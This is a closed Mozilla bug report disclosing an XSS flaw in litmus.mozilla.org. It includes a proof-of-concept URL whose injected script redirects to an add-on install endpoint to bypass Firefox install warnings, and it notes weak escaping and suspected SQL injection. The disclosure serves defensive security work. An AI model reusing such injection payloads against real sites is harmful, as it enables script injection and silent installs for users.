Closed
Bug 718448
Opened 12 years ago
Closed 8 years ago
XSS vulnerability on litmus.mozilla.org allows circumventing add-on source checks in Firefox
Categories
(Webtools Graveyard :: Litmus, defect)
Webtools Graveyard
Litmus
Tracking
(Not tracked)
RESOLVED
WORKSFORME
People
(Reporter: jwkbugzilla, Unassigned)
Details
(Keywords: wsec-xss)
Please see the example link: https://litmus.mozilla.org/advanced_search.cgi?search_field1=comment&match_criteria1=regexp&search_value1=8848484&search_field2=build_id&match_criteria2=%3Cscript%3Ewindow%2Elocation%2Ehref=%22https%3A%2F%2Faddons.mozilla.org%2Fservices%2Finstall.php%3Faddon_id%3D1865%26addon_name%3DGreatest%20Add-on%20Ever%22%3C%2Fscript%3E&search_value2=test This will abuse an XSS vulnerability in litmus.mozilla.org to redirect to https://addons.mozilla.org/services/install.php with a mozilla.org referrer. This page allows installing any AMO add-on if the referring website is a Mozilla site - so in this example you will get prompted to install Adblock Plus without the usual warnings. Regardless of the litmus.mozilla.org vulnerability, I find the functionality of this install script concerning - it allows to use any XSS vulnerability on any Mozilla site to disable security warnings in Firefox when installing add-ons. As to litmus.mozilla.org, the web application seems riddled with bad security practices. Here I abused the non-existent escaping of the match_criteriaN parameter, other parameters are only escaped via quotemeta however - this is clearly insufficient for strings inserted into HTML even though exploiting this vulnerability isn't simple. It's also compiling SQL queries in a way that makes me suspect SQL vulnerabilities if one digs a little.
Updated•12 years ago
|
Group: websites-security → webtools-security
Component: Other → Litmus
Product: Websites → Webtools
QA Contact: other → litmus
Version: unspecified → other
Comment 1•11 years ago
|
||
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
Reporter | ||
Comment 2•8 years ago
|
||
Resolving WORKSFORME since litmus.mozilla.org is gone for good. I think that this can be made public now.
Status: NEW → RESOLVED
Closed: 8 years ago
Flags: needinfo?(amuntner)
Resolution: --- → WORKSFORME
Updated•8 years ago
|
Group: webtools-security
Flags: needinfo?(amuntner)
Assignee | ||
Updated•8 years ago
|
Product: Webtools → Webtools Graveyard
You need to log in
before you can comment on or make changes to this bug.
Description
•